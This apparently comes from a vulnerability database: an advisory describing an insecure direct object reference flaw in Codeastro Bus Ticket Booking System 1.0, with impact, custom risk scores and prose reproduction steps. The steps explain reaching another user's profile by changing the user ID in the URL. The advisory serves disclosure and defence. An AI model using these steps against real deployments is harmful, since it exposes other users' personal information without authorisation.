Primary

Context

Codeastro Bus Ticket Booking System Insecure Direct Object Reference Vulnerability

Vulnerability

A vulnerability allowing unauthorized access to user profiles has been identified in Codeastro Bus Ticket Booking System version 1.0. This Insecure Direct Object Reference (IDOR) issue arises from the absence of proper authentication and authorization checks, allowing attackers to manipulate the user ID in the URL and access another user's profile.

Impact

Exploitation of this vulnerability allows unauthorized users to access and view other users' profiles, potentially leading to unauthorized information disclosure.

Reproduction

To reproduce this vulnerability, log into the application and navigate to a user profile. Then, manually change the user ID in the URL to that of another user. If the profile is accessed without any authentication or authorization checks, the vulnerability is present.

Added: Jun 9, 2025, 7:46 PM

Updated: Jun 9, 2025, 7:46 PM

Vulnerability Rating

Custom Algorithm

spread

1.0

impact

0.6

exploitability

7.8

remediation

0.0

relevance

0.0

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

1.0

impact

0.6

exploitability

7.8

remediation

0.0

relevance

0.0

threat

6.4

urgency

2.9

incentive

1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Codeastro Bus Ticket Booking System Insecure Direct Object Reference Vulnerability

Vulnerability

Impact

Reproduction

Affected Products

Codeastro Bus Ticket Booking System

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating